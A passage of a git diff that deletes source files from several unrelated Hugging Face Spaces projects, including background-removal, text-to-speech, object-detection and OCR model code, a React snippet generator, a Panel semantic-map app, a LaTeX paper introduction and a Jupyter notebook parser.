-import numpy as np -import pooch -from PIL import Image -from PIL.Image import Image as PILImage - -from .base import BaseSession - - -class U2netSession(BaseSession): - def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]: - ort_outs = self.inner_session.run( - None, - self.normalize( - img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225), (320, 320) - ), - ) - - pred = ort_outs[0][:, 0, :, :] - - ma = np.max(pred) - mi = np.min(pred) - - pred = (pred - mi) / (ma - mi) - pred = np.squeeze(pred) - - mask = Image.fromarray((pred * 255).astype("uint8"), mode="L") - mask = mask.resize(img.size, Image.LANCZOS) - - return [mask] - - @classmethod - def download_models(cls, *args, **kwargs): - fname = f"{cls.name()}.onnx" - pooch.retrieve( - "https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx", - None - if cls.checksum_disabled(*args, **kwargs) - else "md5:60024c5c889badc19c04ad937298a77b", - fname=fname, - path=cls.u2net_home(*args, **kwargs), - progressbar=True, - ) - - return os.path.join(cls.u2net_home(), fname) - - @classmethod - def name(cls, *args, **kwargs): - return "u2net" diff --git a/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py b/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py deleted file mode 100644 index a323673bb16070d6d0fffddb939b657d0915ff1b..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Bufeiyan-b-Bert-VITS2/monotonic_align/__init__.py +++ /dev/null @@ -1,20 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - - -def maximum_path(neg_cent, mask): - """ numba optimized version. 
- neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) \ No newline at end of file diff --git a/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py b/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py deleted file mode 100644 index 7566bf351ca9b95af9cdc6d729557a9da083800f..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Jiuxia-Bert-Vits2/text/__init__.py +++ /dev/null @@ -1,28 +0,0 @@ -from text.symbols import * - - -_symbol_to_id = {s: i for i, s in enumerate(symbols)} - -def cleaned_text_to_sequence(cleaned_text, tones, language): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. 
- Args: - text: string to convert to a sequence - Returns: - List of integers corresponding to the symbols in the text - ''' - phones = [_symbol_to_id[symbol] for symbol in cleaned_text] - tone_start = language_tone_start_map[language] - tones = [i + tone_start for i in tones] - lang_id = language_id_map[language] - lang_ids = [lang_id for i in phones] - return phones, tones, lang_ids - -def get_bert(norm_text, word2ph, language): - from .chinese_bert import get_bert_feature as zh_bert - from .english_bert_mock import get_bert_feature as en_bert - lang_bert_func_map = { - 'ZH': zh_bert, - 'EN': en_bert - } - bert = lang_bert_func_map[language](norm_text, word2ph) - return bert diff --git a/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py b/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py deleted file mode 100644 index b04167e0fc5f16bc33e793830ebb9c4ef15ef1ed..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/mmcv_custom/runner/checkpoint.py +++ /dev/null @@ -1,85 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. -import os.path as osp -import time -from tempfile import TemporaryDirectory - -import torch -from torch.optim import Optimizer - -import mmcv -from mmcv.parallel import is_module_wrapper -from mmcv.runner.checkpoint import weights_to_cpu, get_state_dict - -try: - import apex -except: - print('apex is not installed') - - -def save_checkpoint(model, filename, optimizer=None, meta=None): - """Save checkpoint to file. - - The checkpoint will have 4 fields: ``meta``, ``state_dict`` and - ``optimizer``, ``amp``. By default ``meta`` will contain version - and time info. - - Args: - model (Module): Module whose params are to be saved. - filename (str): Checkpoint filename. - optimizer (:obj:`Optimizer`, optional): Optimizer to be saved. - meta (dict, optional): Metadata to be saved in checkpoint. 
- """ - if meta is None: - meta = {} - elif not isinstance(meta, dict): - raise TypeError(f'meta must be a dict or None, but got {type(meta)}') - meta.update(mmcv_version=mmcv.__version__, time=time.asctime()) - - if is_module_wrapper(model): - model = model.module - - if hasattr(model, 'CLASSES') and model.CLASSES is not None: - # save class name to the meta - meta.update(CLASSES=model.CLASSES) - - checkpoint = { - 'meta': meta, - 'state_dict': weights_to_cpu(get_state_dict(model)) - } - # save optimizer state dict in the checkpoint - if isinstance(optimizer, Optimizer): - checkpoint['optimizer'] = optimizer.state_dict() - elif isinstance(optimizer, dict): - checkpoint['optimizer'] = {} - for name, optim in optimizer.items(): - checkpoint['optimizer'][name] = optim.state_dict() - - # save amp state dict in the checkpoint - checkpoint['amp'] = apex.amp.state_dict() - - if filename.startswith('pavi://'): - try: - from pavi import modelcloud - from pavi.exception import NodeNotFoundError - except ImportError: - raise ImportError( - 'Please install pavi to load checkpoint from modelcloud.') - model_path = filename[7:] - root = modelcloud.Folder() - model_dir, model_name = osp.split(model_path) - try: - model = modelcloud.get(model_dir) - except NodeNotFoundError: - model = root.create_training_model(model_dir) - with TemporaryDirectory() as tmp_dir: - checkpoint_file = osp.join(tmp_dir, model_name) - with open(checkpoint_file, 'wb') as f: - torch.save(checkpoint, f) - f.flush() - model.create_file(checkpoint_file, name=model_name) - else: - mmcv.mkdir_or_exist(osp.dirname(filename)) - # immediately flush buffer - with open(filename, 'wb') as f: - torch.save(checkpoint, f) - f.flush() diff --git a/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py b/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py deleted file mode 100644 index 517fe26259217792e0dad80ca3824d914cfe3904..0000000000000000000000000000000000000000 --- 
a/spaces/dineshreddy/WALT/mmdet/models/backbones/darknet.py +++ /dev/null @@ -1,199 +0,0 @@ -# Copyright (c) 2019 Western Digital Corporation or its affiliates. - -import logging - -import torch.nn as nn -from mmcv.cnn import ConvModule, constant_init, kaiming_init -from mmcv.runner import load_checkpoint -from torch.nn.modules.batchnorm import _BatchNorm - -from ..builder import BACKBONES - - -class ResBlock(nn.Module): - """The basic residual block used in Darknet. Each ResBlock consists of two - ConvModules and the input is added to the final output. Each ConvModule is - composed of Conv, BN, and LeakyReLU. In YoloV3 paper, the first convLayer - has half of the number of the filters as much as the second convLayer. The - first convLayer has filter size of 1x1 and the second one has the filter - size of 3x3. - - Args: - in_channels (int): The input channels. Must be even. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). - """ - - def __init__(self, - in_channels, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)): - super(ResBlock, self).__init__() - assert in_channels % 2 == 0 # ensure the in_channels is even - half_in_channels = in_channels // 2 - - # shortcut - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - self.conv1 = ConvModule(in_channels, half_in_channels, 1, **cfg) - self.conv2 = ConvModule( - half_in_channels, in_channels, 3, padding=1, **cfg) - - def forward(self, x): - residual = x - out = self.conv1(x) - out = self.conv2(out) - out = out + residual - - return out - - -@BACKBONES.register_module() -class Darknet(nn.Module): - """Darknet backbone. - - Args: - depth (int): Depth of Darknet. Currently only support 53. 
- out_indices (Sequence[int]): Output from which stages. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - -1 means not freezing any parameters. Default: -1. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). - norm_eval (bool): Whether to set norm layers to eval mode, namely, - freeze running stats (mean and var). Note: Effect on Batch Norm - and its variants only. - - Example: - >>> from mmdet.models import Darknet - >>> import torch - >>> self = Darknet(depth=53) - >>> self.eval() - >>> inputs = torch.rand(1, 3, 416, 416) - >>> level_outputs = self.forward(inputs) - >>> for level_out in level_outputs: - ... print(tuple(level_out.shape)) - ... - (1, 256, 52, 52) - (1, 512, 26, 26) - (1, 1024, 13, 13) - """ - - # Dict(depth: (layers, channels)) - arch_settings = { - 53: ((1, 2, 8, 8, 4), ((32, 64), (64, 128), (128, 256), (256, 512), - (512, 1024))) - } - - def __init__(self, - depth=53, - out_indices=(3, 4, 5), - frozen_stages=-1, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - norm_eval=True): - super(Darknet, self).__init__() - if depth not in self.arch_settings: - raise KeyError(f'invalid depth {depth} for darknet') - self.depth = depth - self.out_indices = out_indices - self.frozen_stages = frozen_stages - self.layers, self.channels = self.arch_settings[depth] - - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - self.conv1 = ConvModule(3, 32, 3, padding=1, **cfg) - - self.cr_blocks = ['conv1'] - for i, n_layers in enumerate(self.layers): - layer_name = f'conv_res_block{i + 1}' - in_c, out_c = self.channels[i] - self.add_module( - layer_name, - self.make_conv_res_block(in_c, out_c, n_layers, **cfg)) - 
self.cr_blocks.append(layer_name) - - self.norm_eval = norm_eval - - def forward(self, x): - outs = [] - for i, layer_name in enumerate(self.cr_blocks): - cr_block = getattr(self, layer_name) - x = cr_block(x) - if i in self.out_indices: - outs.append(x) - - return tuple(outs) - - def init_weights(self, pretrained=None): - if isinstance(pretrained, str): - logger = logging.getLogger() - load_checkpoint(self, pretrained, strict=False, logger=logger) - elif pretrained is None: - for m in self.modules(): - if isinstance(m, nn.Conv2d): - kaiming_init(m) - elif isinstance(m, (_BatchNorm, nn.GroupNorm)): - constant_init(m, 1) - - else: - raise TypeError('pretrained must be a str or None') - - def _freeze_stages(self): - if self.frozen_stages >= 0: - for i in range(self.frozen_stages): - m = getattr(self, self.cr_blocks[i]) - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def train(self, mode=True): - super(Darknet, self).train(mode) - self._freeze_stages() - if mode and self.norm_eval: - for m in self.modules(): - if isinstance(m, _BatchNorm): - m.eval() - - @staticmethod - def make_conv_res_block(in_channels, - out_channels, - res_repeat, - conv_cfg=None, - norm_cfg=dict(type='BN', requires_grad=True), - act_cfg=dict(type='LeakyReLU', - negative_slope=0.1)): - """In Darknet backbone, ConvLayer is usually followed by ResBlock. This - function will make that. The Conv layers always have 3x3 filters with - stride=2. The number of the filters in Conv layer is the same as the - out channels of the ResBlock. - - Args: - in_channels (int): The number of input channels. - out_channels (int): The number of output channels. - res_repeat (int): The number of ResBlocks. - conv_cfg (dict): Config dict for convolution layer. Default: None. - norm_cfg (dict): Dictionary to construct and config norm layer. - Default: dict(type='BN', requires_grad=True) - act_cfg (dict): Config dict for activation layer. - Default: dict(type='LeakyReLU', negative_slope=0.1). 
- """ - - cfg = dict(conv_cfg=conv_cfg, norm_cfg=norm_cfg, act_cfg=act_cfg) - - model = nn.Sequential() - model.add_module( - 'conv', - ConvModule( - in_channels, out_channels, 3, stride=2, padding=1, **cfg)) - for idx in range(res_repeat): - model.add_module('res{}'.format(idx), - ResBlock(out_channels, **cfg)) - return model diff --git a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py b/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py deleted file mode 100644 index a69a4d87603275bc1f89b5f58c722d79274e4fd7..0000000000000000000000000000000000000000 --- a/spaces/dinhminh20521597/OCR_DEMO/configs/_base_/det_models/panet_r18_fpem_ffm.py +++ /dev/null @@ -1,43 +0,0 @@ -model_poly = dict( - type='PANet', - backbone=dict( - type='mmdet.ResNet', - depth=18, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - norm_cfg=dict(type='SyncBN', requires_grad=True), - init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet18'), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[64, 128, 256, 512]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss'), - postprocessor=dict(type='PANPostprocessor', text_repr_type='poly')), - train_cfg=None, - test_cfg=None) - -model_quad = dict( - type='PANet', - backbone=dict( - type='mmdet.ResNet', - depth=18, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=-1, - norm_cfg=dict(type='SyncBN', requires_grad=True), - init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet18'), - norm_eval=True, - style='caffe'), - neck=dict(type='FPEM_FFM', in_channels=[64, 128, 256, 512]), - bbox_head=dict( - type='PANHead', - in_channels=[128, 128, 128, 128], - out_channels=6, - loss=dict(type='PANLoss'), - postprocessor=dict(type='PANPostprocessor', text_repr_type='quad')), - train_cfg=None, - test_cfg=None) diff --git 
a/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py b/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py deleted file mode 100644 index 6fd834d984753844d67100a951f3f5a5a0834d6b..0000000000000000000000000000000000000000 --- a/spaces/dmeck/RVC-Speakers/vits/modules/layer/__init__.py +++ /dev/null @@ -1 +0,0 @@ -from vits.modules.layer.modules import * diff --git a/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx b/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx deleted file mode 100644 index 1a65c723076bb9c088fcf11a5521978ce2885189..0000000000000000000000000000000000000000 --- a/spaces/enzostvs/hub-api-playground/components/editor/main/snippet/python.tsx +++ /dev/null @@ -1,108 +0,0 @@ -import { ApiRoute } from "@/utils/type"; -import classNames from "classnames"; -import { useState } from "react"; -import Highlight from "react-highlight"; -import { BiLogoPython, BiSolidCopy } from "react-icons/bi"; -import { Options } from "redaxios"; - -export const PythonSnippet = ({ - endpoint, - headers, - parameters, - body, - onCopyToClipboard, -}: { - endpoint: ApiRoute; - parameters?: Record; - headers?: Record; - body?: Options | undefined; - onCopyToClipboard: (e: string) => void; -}) => { - const [isCopied, setIsCopied] = useState(false); - - const generatePythonRequestFromEndpoint = () => { - const { method, path } = endpoint; - const fullpath = `${process.env.NEXT_PUBLIC_APP_APIURL}${path}`; - - const removeEmptyValues = (data: Record) => { - const formattedData = { ...data }; - Object.entries(formattedData).forEach(([key, value]) => { - if (!value) { - delete formattedData[key]; - } - if (typeof value === "boolean") { - formattedData[key] = value ? "True" : "False"; - } - }); - return formattedData; - }; - - const Dict: Record = { - GET: () => { - const filteredEmptyParameters = removeEmptyValues(parameters ?? 
{}); - - return `import requests -response = requests.get( - "${fullpath}", - params=${JSON.stringify(filteredEmptyParameters)}, - headers=${JSON.stringify(headers)} -)`; - }, - DELETE: () => { - const formattedBody = removeEmptyValues(body ?? {}); - return `import requests -response = requests.delete( - "${fullpath}", - data=${JSON.stringify(formattedBody)}, - headers=${JSON.stringify(headers)} -)`; - }, - DEFAULT: () => { - const formattedBody = removeEmptyValues(body ?? {}); - return `import requests -response = requests.${method.toLocaleLowerCase()}( - "${fullpath}", - json=${JSON.stringify(formattedBody)}, - headers=${JSON.stringify(headers)} -)`; - }, - }; - - return Dict[method] ? Dict[method]() : Dict["DEFAULT"](); - }; - - const handleCopy = () => { - onCopyToClipboard(generatePythonRequestFromEndpoint()); - setIsCopied(true); - setTimeout(() => { - setIsCopied(false); - }, 1000); - }; - - return ( -
    -
    - -

    Python

    -
    -
    - - {generatePythonRequestFromEndpoint()} - -
    - -
    - Copied! -
    -
    -
    -
    - ); -}; diff --git a/spaces/eugenkalosha/Semmap/app.py b/spaces/eugenkalosha/Semmap/app.py deleted file mode 100644 index d400c35940bbaef2c00eb3b1b6f1ca0d3ece5f5f..0000000000000000000000000000000000000000 --- a/spaces/eugenkalosha/Semmap/app.py +++ /dev/null @@ -1,199 +0,0 @@ -import pandas as pd -import numpy as np -from holoviews.operation.datashader import datashade, dynspread, rasterize -from holoviews.streams import Stream, param -from datafiles import * -from columnnames import * -from helpcomponents import * -from semmap import Semmap -from tapselection import TapSelection - - -import panel as pn -pn.extension('tabulator', 'plotly') -import holoviews as hv -hv.extension('bokeh') - -########################################## -########################################## - -words_lst = dataset2list(HF_DATASET, WORDS_FILE_NAME) -words_nmb = len(words_lst) -topic_list = dataset2list(HF_DATASET, TOPICS_FILE_NAME) -tpc_nmb = len(topic_list) - - -semmap = Semmap(words_lst, topic_list) - -########################################## -########################################## - -CSS_tabulator = """ -.tabulator { - font-size: 12px !important; -} -.tabulator-header{ - padding: 4px; -} -.tabulator-col{ - padding: 0px !important; -} -.tabulator-col-content{ - padding: 0px !important; -} -.tabulator-row{ - padding: 0px !important; - min-height: 5px !important; -} -.tabulator-cell{ - padding: 4px !important; -} -.tabulator-footer{ - padding: 0px !important; -} -""" - -df_words = pd.DataFrame({VZ_SCORE: [], VZ_WORDS: [], VZ_IDS: []}, columns=[VZ_SCORE, VZ_WORDS, VZ_IDS]) -df_words = df_words.astype(dtype={VZ_SCORE: "int64", VZ_WORDS: "string", VZ_IDS: "int64"}) - -Word = Stream.define('Word', w=param.Integer(default=-1), r=param.Integer(default=-1)) -wrd_stream = Word() - -umap_points = hv.Points(semmap.getUmap2D()) -semantic_map = datashade(umap_points) -semantic_map.opts(tools=['box_select'], bgcolor='white', height=700, width=700) - -def selected_info(bounds): - if 
bounds: - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(line_color='red', fill_alpha=0) - else: - return hv.Polygons([[0, 0]]).opts(alpha=0) - - -########################################## -########################################## - -tb1_tapselection = TapSelection() - - -def tb1_rngx_subscriber(x_range): - tb1_tapselection.setx(x_range) - - -def tb1_rngy_subscriber(y_range): - tb1_tapselection.sety(y_range) - - -tb1_words_widget = pn.widgets.Tabulator(df_words, - editors={VZ_SCORE: None, VZ_WORDS: None}, - titles={VZ_SCORE: VZ_SCORE, VZ_WORDS: VZ_WORDS}, - hidden_columns=[VZ_IDS], - page_size=25, show_index=False, - widths={VZ_SCORE: 75, VZ_WORDS: 150}, - stylesheets=[CSS_tabulator], - ) - -tb1_topic_df = pd.DataFrame({VZ_SCORE: [], VZ_TOPIC: [], VZ_IDS: []}, columns=[VZ_SCORE, VZ_TOPIC, VZ_IDS]) -tb1_topic_df = tb1_topic_df.astype(dtype={VZ_SCORE: "int64", VZ_TOPIC: "string", VZ_IDS: "int64"}) -tb1_topiclist_widget = pn.widgets.Tabulator(tb1_topic_df, - editors={VZ_SCORE: None, VZ_TOPIC: None, VZ_IDS: None}, - titles={VZ_SCORE: "score", VZ_TOPIC: "topic name"}, - hidden_columns=[VZ_IDS], - page_size=25, show_index=False, - widths={VZ_SCORE: 75, VZ_TOPIC: 250}, - stylesheets=[CSS_tabulator], - ) - -tb1_button_hide = pn.widgets.Button(name='Hide', button_type='primary', margin=(15, 0, 0, 0)) - -def tb1_hide_callback(e): - info_pn.object = "" - tb1_wrd_map.event(w=-1, r=-1) - -tb1_button_hide.on_click(tb1_hide_callback) - -def tb1_wordMap(w, r): - if w != -1: - coord = semmap.wordPoints(w) - return hv.Points(coord).opts(color='red', alpha=1) - if r != -1: - coord = semmap.topicPoints(r) - return hv.Points(coord).opts(color='yellow', alpha=1) - return hv.Points([0, 0]).opts(alpha=0) - -tb1_wrd_map = hv.DynamicMap(tb1_wordMap, streams=[wrd_stream]) - -def tb1_words_callback(e): - row = e.row - ind = int(tb1_words_widget.value.iloc[row, 2]) - 
info_pn.object = "Word '" + words_lst[ind] + "'" - tb1_wrd_map.event(w=ind, r=-1) - -tb1_words_widget.on_click(tb1_words_callback) - -def tb1_topiclist_callback(e): - row = e.row - ind = int(tb1_topiclist_widget.value.iloc[row, 2]) - info_pn.object = "Topic '" + topic_list[ind] + "'" - tb1_wrd_map.event(r=ind, w=-1) - -tb1_topiclist_widget.on_click(tb1_topiclist_callback) - -maxTableSize = 25 - -def tb1_tap_subscriber(x, y): - if x and y: - bounds = tb1_tapselection.getBound(x, y) - wrd_tbl, tpc_tbl = semmap.getTables(bounds) - tb1_words_widget.value = wrd_tbl - tb1_topiclist_widget.value = tpc_tbl - - -tb1_stream_tap = hv.streams.SingleTap(source=tb1_wrd_map) -tb1_stream_tap.add_subscriber(tb1_tap_subscriber) - -tb1_stream_rngx = hv.streams.RangeX(source=semantic_map) -tb1_stream_rngx.add_subscriber(tb1_rngx_subscriber) -tb1_stream_rngy = hv.streams.RangeY(source=semantic_map) -tb1_stream_rngy.add_subscriber(tb1_rngy_subscriber) - - -def selected_info(x, y): - if x and y: - xmin, ymin, xmax, ymax = tb1_tapselection.getBound(x, y) - bounds = np.array([xmin, ymin, xmax, ymax]) - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(line_color='lightgreen', alpha=1, fill_alpha=0, line_width=5) - else: - xmin, ymin, xmax, ymax = (0, 0, 0, 0) - bounds = np.array([xmin, ymin, xmax, ymax]) - rectangle = np.array( - [[bounds[0], bounds[1]], [bounds[0], bounds[3]], [bounds[2], bounds[3]], [bounds[2], bounds[1]]]) - return hv.Polygons(rectangle).opts(alpha=0) - - -tb1_selected_points = hv.DynamicMap(selected_info, streams=[tb1_stream_tap]) -semantic_map.opts(tools=["pan", "box_zoom", "wheel_zoom", "reset"]) -tb1_semmap_show = semantic_map * tb1_wrd_map * tb1_selected_points - -info_pn = pn.pane.Str("", styles={'font-size': '12pt'}, margin=(0, 0, 0, 50)); - -cl_topics = pn.Column(pn.Row("# Topics", hlp_topics), tb1_topiclist_widget) -cl_semmap = 
pn.Column(pn.Row(pn.Spacer(width=200), "# Semantic Map", hlp_semmap, tb1_button_hide), info_pn, tb1_semmap_show) -cl_words = pn.Column(pn.Row("# Words", hlp_words), tb1_words_widget) -rw_app = pn.Row(cl_topics, cl_semmap, cl_words) - -tb1_template = pn.template.BootstrapTemplate( - title='Wikipedia Semantic Map', sidebar_width = 450 -) -tb1_template.main.append(rw_app) -tb1_template.sidebar.append(help_sidebar_pane) - -########################################## -########################################## - -tb1_template.servable() - diff --git a/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex b/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex deleted file mode 100644 index 1baa8915f4cf7aec2520894a87470fc9436d954b..0000000000000000000000000000000000000000 --- a/spaces/f2api/gpt-academic/crazy_functions/test_project/latex/attention/introduction.tex +++ /dev/null @@ -1,18 +0,0 @@ -Recurrent neural networks, long short-term memory \citep{hochreiter1997} and gated recurrent \citep{gruEval14} neural networks in particular, have been firmly established as state of the art approaches in sequence modeling and transduction problems such as language modeling and machine translation \citep{sutskever14, bahdanau2014neural, cho2014learning}. Numerous efforts have since continued to push the boundaries of recurrent language models and encoder-decoder architectures \citep{wu2016google,luong2015effective,jozefowicz2016exploring}. - -Recurrent models typically factor computation along the symbol positions of the input and output sequences. Aligning the positions to steps in computation time, they generate a sequence of hidden states $h_t$, as a function of the previous hidden state $h_{t-1}$ and the input for position $t$. 
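The step-by-step recurrence just described can be sketched compactly as
\begin{equation*}
    h_t = f(h_{t-1},\, x_t),
\end{equation*}
% $f$ and $x_t$ are illustrative notation introduced here, not taken from any one recurrent architecture.
where $x_t$ denotes the input at position $t$ and $f$ is the learned transition function; this notation is a generic sketch rather than the formulation of a specific model, and it makes explicit why each $h_t$ cannot be computed before $h_{t-1}$ is available.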
This inherently sequential nature precludes parallelization within training examples, which becomes critical at longer sequence lengths, as memory constraints limit batching across examples. -%\marginpar{not sure if the memory constraints are understandable here} -Recent work has achieved significant improvements in computational efficiency through factorization tricks \citep{Kuchaiev2017Factorization} and conditional computation \citep{shazeer2017outrageously}, while also improving model performance in case of the latter. The fundamental constraint of sequential computation, however, remains. - -%\marginpar{@all: there is work on analyzing what attention really does in seq2seq models, couldn't find it right away} - -Attention mechanisms have become an integral part of compelling sequence modeling and transduction models in various tasks, allowing modeling of dependencies without regard to their distance in the input or output sequences \citep{bahdanau2014neural, structuredAttentionNetworks}. In all but a few cases \citep{decomposableAttnModel}, however, such attention mechanisms are used in conjunction with a recurrent network. - -%\marginpar{not sure if "cross-positional communication" is understandable without explanation} -%\marginpar{insert exact training times and stats for the model that reaches sota earliest, maybe even a single GPU model?} - -In this work we propose the Transformer, a model architecture eschewing recurrence and instead relying entirely on an attention mechanism to draw global dependencies between input and output. The Transformer allows for significantly more parallelization and can reach a new state of the art in translation quality after being trained for as little as twelve hours on eight P100 GPUs. -%\marginpar{you removed the constant number of repetitions part. I wrote it because I wanted to make it clear that the model does not only perform attention once, while it's also not recurrent. 
I thought that might be important to get across early.} - - % Just a standard paragraph with citations, rewrite. - %After the seminal papers of \citep{sutskever14}, \citep{bahdanau2014neural}, and \citep{cho2014learning}, recurrent models have become the dominant solution for both sequence modeling and sequence-to-sequence transduction. Many efforts such as \citep{wu2016google,luong2015effective,jozefowicz2016exploring} have pushed the boundaries of machine translation and language modeling with recurrent sequence models. Recent effort \citep{shazeer2017outrageously} has combined the power of conditional computation with sequence models to train very large models for machine translation, pushing SOTA at lower computational cost. Recurrent models compute a vector of hidden states $h_t$, for each time step $t$ of computation. $h_t$ is a function of both the input at time $t$ and the previous hidden state $h_{t-1}$. This dependence on the previous hidden state prevents recurrent models from processing multiple inputs at once, and their time complexity is a linear function of the length of the input and output, both during training and inference. [What I want to say here is that although this is fine during decoding, at training time, we are given both input and output and this linear nature does not allow the RNN to process all inputs and outputs simultaneously, and recurrent models haven't been used on datasets that are of the scale of the web. What's the largest dataset we have? Talk about NVIDIA and possibly others' efforts to speed up things, and possibly other efforts that alleviate this, but are still limited by its computational nature]. Rest of the intro: What if you could construct the state based on the actual inputs and outputs, then you could construct them all at once. This has been the foundation of many promising recent efforts, bytenet, facenet (Also talk about quasi rnn here). Now we talk about attention!!
Along with cell architectures such as long short-term memory (LSTM) \citep{hochreiter1997}, and gated recurrent units (GRUs) \citep{cho2014learning}, attention has emerged as an essential ingredient in successful sequence models, in particular for machine translation. In recent years, many, if not all, state-of-the-art (SOTA) results in machine translation have been achieved with attention-based sequence models \citep{wu2016google,luong2015effective,jozefowicz2016exploring}. Talk about the neon work on how it played with attention to do self attention! Then talk about what we do. \ No newline at end of file diff --git "a/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" "b/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" deleted file mode 100644 index b4bcd56109b42d3023f24eade7c0cd5671d3c5a4..0000000000000000000000000000000000000000 --- "a/spaces/f2api/gpt-academic/crazy_functions/\350\247\243\346\236\220JupyterNotebook.py" +++ /dev/null @@ -1,146 +0,0 @@ -from toolbox import update_ui -from toolbox import CatchException, report_execption, write_results_to_file -fast_debug = True - - -class PaperFileGroup(): - def __init__(self): - self.file_paths = [] - self.file_contents = [] - self.sp_file_contents = [] - self.sp_file_index = [] - self.sp_file_tag = [] - - # count_token - from request_llm.bridge_all import model_info - enc = model_info["gpt-3.5-turbo"]['tokenizer'] - def get_token_num(txt): return len( - enc.encode(txt, disallowed_special=())) - self.get_token_num = get_token_num - - def run_file_split(self, max_token_limit=1900): - """ - 将长文本分离开来 - """ - for index, file_content in enumerate(self.file_contents): - if self.get_token_num(file_content) < max_token_limit: - self.sp_file_contents.append(file_content) - self.sp_file_index.append(index) - self.sp_file_tag.append(self.file_paths[index]) - else: - from .crazy_utils import breakdown_txt_to_satisfy_token_limit_for_pdf - segments =
breakdown_txt_to_satisfy_token_limit_for_pdf( - file_content, self.get_token_num, max_token_limit) - for j, segment in enumerate(segments): - self.sp_file_contents.append(segment) - self.sp_file_index.append(index) - self.sp_file_tag.append( - self.file_paths[index] + f".part-{j}.txt") - - - -def parseNotebook(filename, enable_markdown=1): - import json - - CodeBlocks = [] - with open(filename, 'r', encoding='utf-8', errors='replace') as f: - notebook = json.load(f) - for cell in notebook['cells']: - if cell['cell_type'] == 'code' and cell['source']: - # remove blank lines - cell['source'] = [line for line in cell['source'] if line.strip() - != ''] - CodeBlocks.append("".join(cell['source'])) - elif enable_markdown and cell['cell_type'] == 'markdown' and cell['source']: - cell['source'] = [line for line in cell['source'] if line.strip() - != ''] - CodeBlocks.append("Markdown:"+"".join(cell['source'])) - - Code = "" - for idx, code in enumerate(CodeBlocks): - Code += f"This is {idx+1}th code block: \n" - Code += code+"\n" - - return Code - - -def ipynb解释(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt): - from .crazy_utils import request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency - - if ("advanced_arg" in plugin_kwargs) and (plugin_kwargs["advanced_arg"] == ""): plugin_kwargs.pop("advanced_arg") - enable_markdown = plugin_kwargs.get("advanced_arg", "1") - try: - enable_markdown = int(enable_markdown) - except ValueError: - enable_markdown = 1 - - pfg = PaperFileGroup() - - for fp in file_manifest: - file_content = parseNotebook(fp, enable_markdown=enable_markdown) - pfg.file_paths.append(fp) - pfg.file_contents.append(file_content) - - # <-------- 拆分过长的IPynb文件 ----------> - pfg.run_file_split(max_token_limit=1024) - n_split = 